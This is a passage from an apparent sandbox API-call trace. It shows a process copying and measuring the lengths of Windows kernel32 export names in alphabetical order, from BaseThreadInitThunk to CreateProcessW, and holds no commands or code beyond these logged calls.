lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.446] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.446] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.446] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.446] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.446] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.446] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.446] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.446] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.446] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.446] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.446] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.446] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.446] lstrlenA (lpString="BEEP") returned 4 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.446] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.446] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.446] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.446] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.447] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.447] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.447] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.447] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.447] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.447] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.447] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.447] lstrlenA (lpString="CANCELIO") returned 8 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.447] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.447] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.447] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.447] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.447] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.447] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.447] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.447] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.447] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.447] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.447] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.447] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.448] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.448] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.448] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.448] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.448] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.448] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.448] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.448] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.448] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.448] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.448] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.448] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.448] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.448] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.448] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.448] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.448] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.448] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.448] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.448] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.449] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.449] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.449] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.449] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.449] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.449] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.449] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.449] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.449] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.449] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.449] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.449] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.449] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.449] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.449] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.449] lstrlenA (lpString="COPYFILEA") returned 9 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.449] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.449] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.449] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.450] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.450] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.450] lstrlenA (lpString="COPYFILEW") returned 9 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.450] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.450] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.450] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.450] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.450] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.450] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.450] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.450] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.450] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.450] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.450] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.450] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.450] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.450] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.450] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.450] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.450] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.451] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.451] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.451] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.451] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.451] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.451] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.451] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.451] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.451] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.451] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.451] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.451] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.451] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.451] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.451] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.451] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.451] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.451] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.451] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.451] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.452] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.452] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.452] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.452] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.452] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.452] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.452] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.452] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.452] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.452] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.452] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.452] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.452] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.452] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.452] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.452] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, 